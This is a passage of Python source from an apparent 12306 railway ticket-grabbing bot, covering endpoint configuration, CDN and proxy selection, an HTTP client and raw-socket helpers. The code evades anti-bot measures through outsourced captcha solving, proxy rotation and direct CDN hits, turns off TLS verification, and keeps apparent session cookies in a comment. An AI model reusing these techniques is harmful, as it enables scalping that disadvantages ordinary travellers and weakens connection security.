"kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 3, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "login": { # 登录接口 "req_url": "/passport/web/login", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.5, "is_logger": True, "is_cdn": True, "is_json": True, }, "left_ticket_init": { # 登录接口 "req_url": "/otn/leftTicket/init", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "getCodeImg": { # 登录验证码 "req_url": "/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand&{0}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_json": False, "is_cdn": True, "not_decode": True, }, "getCodeImg1": { # 登录验证码 "req_url": "/passport/captcha/captcha-image64?login_site=E&module=login&rand=sjrand&{0}&callback=jQuery19108016482864806321_1554298927290&_=1554298927293", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck": { # 验证码校验 "req_url": "/passport/captcha/captcha-check", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck1": { # 验证码校验 "req_url": "/passport/captcha/captcha-check?callback=jQuery19108016482864806321_1554298927290&answer={0}&rand=sjrand&login_site=E&_={1}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": False, }, "loginInit": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "loginInitCdn": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": True, "is_cdn": True, "is_json": False, }, "loginInitCdn1": { # 登录页面 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/view/index.html", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": False, "is_cdn": True, "is_json": False, }, "getDevicesId": { # 获取用户信息 "req_url": "/otn/HttpZF/logdevice", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": False, }, "getUserInfo": { # 获取用户信息 "req_url": "/otn/index/initMy12306", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": False, "is_json": False, }, "userLogin": { # 用户登录 "req_url": "/otn/login/userLogin", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "uamauthclient": { # 登录 "req_url": "/otn/uamauthclient", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "initdc_url": { # 生成订单页面 "req_url": "/otn/confirmPassenger/initDc", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 1, "is_logger": False, "is_cdn": True, "is_json": False, }, "GetJS": { # 订单页面js "req_url": "/otn/HttpZF/GetJS", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "odxmfwg": { # 订单页面js "req_url": "/otn/dynamicJs/odxmfwg", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "get_passengerDTOs": { # 获取乘车人 "req_url": "/otn/confirmPassenger/getPassengerDTOs", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "select_url": { # 查询余票 "req_url": "/otn/{3}?leftTicketDTO.train_date={0}&leftTicketDTO.from_station={1}&leftTicketDTO.to_station={2}&purpose_codes=ADULT", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 0.01, "s_time": 0.01, "is_logger": False, "is_json": True, "is_cdn": True, }, "check_user_url": { # 检查用户登录 "req_url": "/otn/login/checkUser", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 1, "is_cdn": True, "is_logger": True, "is_json": True, }, "submit_station_url": { # 提交订单 "req_url": "/otn/leftTicket/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "checkOrderInfoUrl": { # 检查订单信息规范 "req_url": "/otn/confirmPassenger/checkOrderInfo", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountUrl": { # 剩余余票数 "req_url": "/otn/confirmPassenger/getQueueCount", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkQueueOrderUrl": { # 订单队列排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkRandCodeAnsyn": { # 暂时没用到 "req_url": "/otn/passcodeNew/checkRandCodeAnsyn", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "codeImgByOrder": { # 订单页面验证码 "req_url": "/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&{}", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "queryOrderWaitTimeUrl": { # 订单等待页面 "req_url": "/otn/confirmPassenger/queryOrderWaitTime?random={0}&tourFlag=dc&_json_att=", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "queryMyOrderNoCompleteUrl": { # 订单查询页面 "req_url": "/otn/queryOrder/queryMyOrderNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "initNoCompleteUrl": { # 获取订单列表 "req_url": "/otn/queryOrder/initNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "cancelNoCompleteMyOrder": { # 取消订单 "req_url": "/otn/queryOrder/cancelNoCompleteMyOrder", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoSubmitOrderRequest": { # 快速自动提交订单 "req_url": "/otn/confirmPassenger/autoSubmitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountAsync": { # 快速获取订单数据 "req_url": "/otn/confirmPassenger/getQueueCountAsync", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "confirmSingleForQueueAsys": { # 快速订单排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueueAsys", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Content-Type": 1, "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "Pushbear": { # push通知 "req_url": "/sub", "req_type": "post", "Referer": "", "Content-Type": 1, "Host": "pushbear.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_json": True, }, "ServerChan": { # Server酱 push通知 "req_url": "/", "req_type": "get", "Referer": "", "Content-Type": 1, "Host": "sc.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_json": True, }, "loginHtml": { # 登录接口2 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginConf": { # 登录接口2 "req_url": "/otn/login/conf", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginAysnSuggest": { # 登录接口2 "req_url": "/otn/login/loginAysnSuggest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "is_cdn": True, "s_time": 0.1, "is_logger": True, "is_json": True, }, # 候补订单接口 "chechFace": { # 人脸识别 "req_url": "/otn/afterNate/chechFace", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "getSuccessRate": { # 成功信息 "req_url": "/otn/afterNate/getSuccessRate", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "SubmitOrderRequestRsp": { # 提交候补订单准备 "req_url": "/otn/afterNate/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "confirmHB": { # 设置订单信息 "req_url": "/otn/afterNate/confirmHB", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "queryQueue": { # 排队 "req_url": "/otn/afterNate/queryQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "passengerInitApi": { # 排队 "req_url": "/otn/afterNate/passengerInitApi", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoVerifyImage": { # 云打码接口 "req_url": TickerConfig.REQ_URL, "req_type": "post", "Referer": "", "Host": TickerConfig.HOST, "re_try": 6, "re_time": 10, "s_time": 0.001, "is_logger": True, "is_json": True, "httpType": TickerConfig.HTTP_TYPE }, } File: agency/__init__.py File: agency/cdn_utils.py # encoding=utf8 import datetime import operator import os import requests from config import urlConf import threading from config.urlConf import urls from myUrllib.httpUtils import HTTPClient cdn_list = [] class CDNProxy(threading.Thread): def __init__(self, cdns): super().__init__() self.cdns = cdns self.urlConf = urlConf.urls self.httpClint = requests self.city_list = [] self.timeout = 5 def run(self): for cdn in self.cdns: http = HTTPClient(0) url = urls["loginInitCdn"] http._cdn = cdn.replace("\n", "") start_time = datetime.datetime.now() rep = http.send(url) retTime = (datetime.datetime.now() - start_time).microseconds / 1000 if rep and "message" not in rep and retTime < 3000: if cdn.replace("\n", "") not in cdn_list: # 如果有重复的cdn,则放弃加入 print(f"加入cdn: {cdn}") cdn_list.append({"ip": cdn.replace("\n", ""), "time": retTime}) def open_cdn_file(cdnFile): cdn = [] path = os.path.join(os.path.dirname(__file__), f'../{cdnFile}') try: with open(path, "r", encoding="utf-8") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn except Exception: with open(path, "r") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn def sortCdn(): """ 对cdn进行排序 :return: """ ips = [] cs = sorted(cdn_list, key=operator.itemgetter('time')) for c in cs: print(f"当前ip: {c['ip']}, 延时: {c['time']}") ips.append(c["ip"]) return ips def filterCdn(): """ 过滤cdn, 过滤逻辑为当前cdn响应值小于1000毫秒 过滤日志: 加入cdn: 116.77.75.146 :return: """ cdns = open_cdn_file("cdn_list") cdnss = [cdns[i:i + 50] for i in range(0, len(cdns), 50)] cdnThread = [] for cdn in cdnss: t = CDNProxy(cdn) cdnThread.append(t) for cdn_t in cdnThread: cdn_t.start() for cdn_j in cdnThread: cdn_j.join() print(f"当前有效cdn个数为: {len(cdn_list)}") if cdn_list: ips = sortCdn() path = os.path.join(os.path.dirname(__file__), f'../filter_cdn_list') f = open(path, "a+") f.seek(0) f.truncate() f.writelines("") for ip in ips: f.writelines(f"{ip}\n") f.close() if __name__ == '__main__': filterCdn() File: agency/agency_tools.py # encoding=utf8 import os import random import socket import time import requests from bs4 import BeautifulSoup class proxy: def __init__(self): self.proxy_list = [] self.proxy_filter_list = [] def get_proxy(self): """ 获取未加工代理列表 :return: """ User_Agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' header = dict() header['User-Agent'] = User_Agent for i in range(1, 5): time.sleep(1) url = 'http://www.xicidaili.com/nn/' + str(i) res = requests.get(url=url, headers=header).content soup = BeautifulSoup(res, "html.parser") ips = soup.findAll('tr') for x in range(1, len(ips)): ip = ips[x] tds = ip.findAll("td") ip_temp = tds[1].contents[0] + ":" + tds[2].contents[0] print(ip_temp) self.proxy_list.append(ip_temp) def filter_proxy(self): """ 将不可用IP剔除 :return: """ socket.setdefaulttimeout(1) path = os.path.join(os.path.dirname(__file__), './proxy_list') f = open(path, "w") head = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'Connection': 'keep-alive'} url = "http://icanhazip.com" proxy_num = 0 for proxy in self.proxy_list: proxy_temp = {"https": "https://{}".format(proxy)} try: req = requests.get(url, proxies=proxy_temp, timeout=2, headers=head).content print(req) write_proxy = proxy + "\n" f.write(write_proxy) proxy_num += 1 except Exception: print ("代理链接超时,去除此IP:{0}".format(proxy)) continue print("总共可使用ip量为{}个".format(proxy_num)) def get_filter_proxy(self): """ 读取该可用ip文件 :return: 可用ip文件list """ path = os.path.join(os.path.dirname(__file__), './proxy_list') try: with open(path, "r", encoding="utf-8") as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) except Exception: with open(path, "r", ) as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) return self.proxy_filter_list def main(self): # self.get_proxy() self.filter_proxy() def setProxy(self): """ 开启此功能的时候请确保代理ip是否可用 查询的时候设置代理ip,ip设置格式是ip地址+端口,推荐可用的ip代理池:https://github.com/jhao104/proxy_pool :return: """ ip = self.get_filter_proxy() setIp = ip[random.randint(0, len(ip) - 1)] proxie = { 'http': 'http://{}'.format(setIp), 'https': 'http://{}'.format(setIp), } return proxie if __name__ == "__main__": a = proxy() print(a.get_filter_proxy()) File: myUrllib/httpUtils.py # -*- coding: utf8 -*- import json import random import socket from collections import OrderedDict from time import sleep import requests from fake_useragent import UserAgent import TickerConfig from agency.agency_tools import proxy from config import logger def _set_header_default(): header_dict = OrderedDict() # header_dict["Accept"] = "application/json, text/plain, */*" header_dict["Accept-Encoding"] = "gzip, deflate" header_dict[ "User-Agent"] = _set_user_agent() header_dict["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" header_dict["Origin"] = "https://kyfw.12306.cn" header_dict["Connection"] = "keep-alive" return header_dict def _set_user_agent(): # try: # user_agent = UserAgent(verify_ssl=False).random # return user_agent # except: # print("请求头设置失败,使用默认请求头") # return 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' + str( # random.randint(5000, 7000)) + '.0 Safari/537.36' return "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" class HTTPClient(object): def __init__(self, is_proxy, cdnList=None): """ cdnList试试切换不包括查询的cdn,防止查询cdn污染登陆和下单cdn :param method: :param headers: Must be a dict. Such as headers={'Content_Type':'text/html'} """ self.initS() self._cdn = None self.cdnList = cdnList self._proxies = None if is_proxy is 1: self.proxy = proxy() self._proxies = self.proxy.setProxy() # print(u"设置当前代理ip为 {}, 请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!".format(self._proxies)) def initS(self): self._s = requests.Session() self._s.headers.update(_set_header_default()) return self def set_cookies(self, kwargs): """ 设置cookies :param kwargs: :return: """ for kwarg in kwargs: for k, v in kwarg.items(): self._s.cookies.set(k, v) def get_cookies(self): """ 获取cookies :return: """ return self._s.cookies.values() def del_cookies(self): """ 删除所有的key :return: """ self._s.cookies.clear() def del_cookies_by_key(self, key): """ 删除指定key的session :return: """ self._s.cookies.set(key, None) def setHeaders(self, headers): self._s.headers.update(headers) return self def resetHeaders(self): self._s.headers.clear() self._s.headers.update(_set_header_default()) def getHeadersHost(self): return self._s.headers["Host"] def setHeadersHost(self, host): self._s.headers.update({"Host": host}) return self def setHeadersUserAgent(self): self._s.headers.update({"User-Agent": _set_user_agent()}) def getHeadersUserAgent(self): return self._s.headers["User-Agent"] def getHeadersReferer(self): return self._s.headers["Referer"] def setHeadersReferer(self, referer): self._s.headers.update({"Referer": referer}) return self @property def cdn(self): return self._cdn @cdn.setter def cdn(self, cdn): self._cdn = cdn def send(self, urls, data=None, **kwargs): """send request to url.If response 200,return response, else return None.""" allow_redirects = False is_logger = urls.get("is_logger", False) req_url = urls.get("req_url", "") re_try = urls.get("re_try", 0) s_time = urls.get("s_time", 0) is_cdn = urls.get("is_cdn", False) is_test_cdn = urls.get("is_test_cdn", False) error_data = {"code": 99999, "message": u"重试次数达到上限"} if data: method = "post" self.setHeaders({"Content-Length": "{0}".format(len(data))}) else: method = "get" self.resetHeaders() if TickerConfig.RANDOM_AGENT is 1: self.setHeadersUserAgent() self.setHeadersReferer(urls["Referer"]) if is_logger: logger.log( u"url: {0}\n入参: {1}\n请求方式: {2}\n".format(req_url, data, method)) self.setHeadersHost(urls["Host"]) if is_test_cdn: url_host = self._cdn elif is_cdn: if self._cdn: # print(u"当前请求cdn为{}".format(self._cdn)) url_host = self._cdn else: url_host = urls["Host"] else: url_host = urls["Host"] http = urls.get("httpType") or "https" for i in range(re_try): try: # sleep(urls["s_time"]) if "s_time" in urls else sleep(0.001) sleep(s_time) try: requests.packages.urllib3.disable_warnings() except: pass response = self._s.request(method=method, timeout=5, proxies=self._proxies, url=http + "://" + url_host + req_url, data=data, allow_redirects=allow_redirects, verify=False, **kwargs) if response.status_code == 200 or response.status_code == 302: if urls.get("not_decode", False): return response.content if response.content: if is_logger: logger.log( u"出参:{0}".format(response.content.decode())) if urls["is_json"]: return json.loads( response.content.decode() if isinstance(response.content, bytes) else response.content) else: return response.content.decode("utf8", "ignore") if isinstance(response.content, bytes) else response.content else: print(f"url: {urls['req_url']}返回参数为空, 接口状态码: {response.status_code}") logger.log( u"url: {} 返回参数为空".format(urls["req_url"])) if self.cdnList: # 如果下单或者登陆出现cdn 302的情况,立马切换cdn url_host = self.cdnList.pop(random.randint(0, 4)) continue else: sleep(urls["re_time"]) except (requests.exceptions.Timeout, requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError): pass except socket.error: pass return error_data File: myUrllib/__init__.py File: myUrllib/MySocketUtils.py # coding=utf-8 import json import socket import re # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect(('183.232.189.31', 80)) # get_str = 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: %s\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' # post_str = "POST {0} HTTP/1.1\r\n" \ # "Host: kyfw.12306.cn\r\n" \ # "Connection: close\r\n"\ # "Origin: https://kyfw.12306.cn\r\n" \ # "X-Requested-With: XMLHttpRequest\r\n" \ # "Referer: https://kyfw.12306.cn/otn/leftTicket/init\r\n" \ # "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ # "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ # "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ # "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ # "Content-Length: 9\r\n"\ # "Cookie: _passport_session=a459aba69761497eb31de76c27795e999613; _passport_ct=9116b2cb0bf443e1a01d22ac8c1ae449t5007; route=9036359bb8a8a461c164a04f8f50b252; BIGipServerpool_passport=200081930.50215.0000; BIGipServerotn=484704778.64545.0000\r\n\n"\ # "appid=otn\r\n" # # s.sendall(get_str.format("https://kyfw.12306.cn/otn/resources/login.html")) # s.sendall(post_str.format("https://kyfw.12306.cn/passport/web/auth/uamtk")) from config.urlConf import urls def default_get_data(): """ get请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 :return: """ return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ 'Host: kyfw.12306.cn\r\n' \ "Referer: {1}\r\n" \ 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ '\r\nAccept: */*\r\n' \ "Cookie: {2}\r\n\n"\ '\r\n' # return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: kyfw.12306.cn\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' def default_post_data(): """ post请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 -- Referer 请求页面来源 -- Content-Length: body 长度 -- Cookie 页面请求的身份认证 -- appid 接口请求报文 :return: """ return "POST https://kyfw.12306.cn{0} HTTP/1.1\r\n" \ "Host: kyfw.12306.cn\r\n" \ "Connection: close\r\n"\ "Origin: https://kyfw.12306.cn\r\n" \ "X-Requested-With: XMLHttpRequest\r\n" \ "Referer: {3}\r\n" \ "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ "Content-Length: {2}\r\n"\ "Cookie: {4}\r\n\n"\ "{1}\r\n"\ # "\r\n" class socketUtils: def __init__(self, host, port=80): self.host = host self.port = port self.s = self.connect_socket(self.host, self.port) def connect_socket(self, host, port): """ 连接socket :param host: :param port: :return: """ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host if isinstance(host, str) else str(host), port if isinstance(port, int) else int(port))) return s def close_s(self): self.s.close() # def send(self, urls, Cookie=None, data=None): # """ # 发送请求 # :param urls: # :param data: # :param cookie: # :return: # """ # url = urls.get("req_url", "") # Referer = urls.get("Referer", "") # if urls.get("req_type", "get") == "post": # Content_Length = len(data) # Cookie = "tk=pnidlCoFy2B7wxO_X_pESbrkZFSq3OtVA_xzXwuba2a0; JSESSIONID=C6144324BFCE36AC5082E543E934E8B3; current_captcha_type=Z; _jc_save_fromDate=2018-08-03; _jc_save_fromStation=%u6DF1%u5733%2CSZQ; _jc_save_toDate=2018-08-03; _jc_save_toStation=%u957F%u6C99%2CCSQ; _jc_save_wfdc_flag=dc; ten_key=b5L6aMWfnzBm8CgQe8pcAKQsmVBS2PYH; BIGipServerpool_passport=166527498.50215.0000; BIGipServerotn=165937674.50210.0000; route=c5c62a339e7744272a54643b3be5bf64; RAIL_DEVICEID=fC-yepiUqNjsBiRvtLBXW4JqQmabCfB9QxI3FifJZK9YDRsImhJLSz4sAQ4HiGF7uQAFdFyISg6jA7KAhtpEldJV9ZMNsn6Dzm_psA5CBDwSNfiORf42w-LIRvkeGvdKFtegZwWGlkA2fVuEWKu-1xAYdCXRnsMD; RAIL_EXPIRATION=1533420302032; _jc_save_detail=true" # if data: # send_value = default_post_data().format(url, # data, # Content_Length, # Referer, # Cookie # ) # print("send_value: " + send_value) # self.s.sendall(send_value) # else: # self.s.sendall(default_get_data().format(url, # Referer, # Cookie)) # total_data = "" # while 1: # data = self.s.recv(1024) # total_data += data # if not data: # break # self.close_s() # print(total_data) # return self.recv_data(total_data) def recv_data(self, r_data): cookie = self.get_cookie(r_data) status_code = self.get_status_code(r_data) r_body = self.get_rep_body(r_data) return { "cookie": cookie, "status_code": status_code, "r_body": r_body } @staticmethod def get_cookie(recv_data): """ 提取cookie :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) cookies_re = re.compile(r"Set-Cookie: (\S+);") cookies = re.findall(cookies_re, recv_data) return "; ".join(cookies) @staticmethod def get_status_code(recv_data): """ 获取状态码 :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) http_code_re = re.compile(r"HTTP/1.1 (\S+) ") status_code = re.search(http_code_re, recv_data).group(1) return status_code @staticmethod def get_rep_body(recv_data): """ 获取返回值 :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) if recv_data.find("{") != -1 and recv_data.find("}") != -1: data = json.loads(recv_data.split("\n")[-1]) return data else: print(recv_data) if __name__ == "__main__": so = socketUtils('183.232.189.31', 80) train_date = "2018-08-03" from_station = "SZQ" to_station = "CSQ" urls["select_url"]["req_url"] = "https://kyfw.12306.cn" + urls["select_url"]["req_url"].format(train_date, from_station, to_station) result = so.send(urls=urls["select_url"]) print(result) so = socketUtils('183.232.189.31', 80) data = 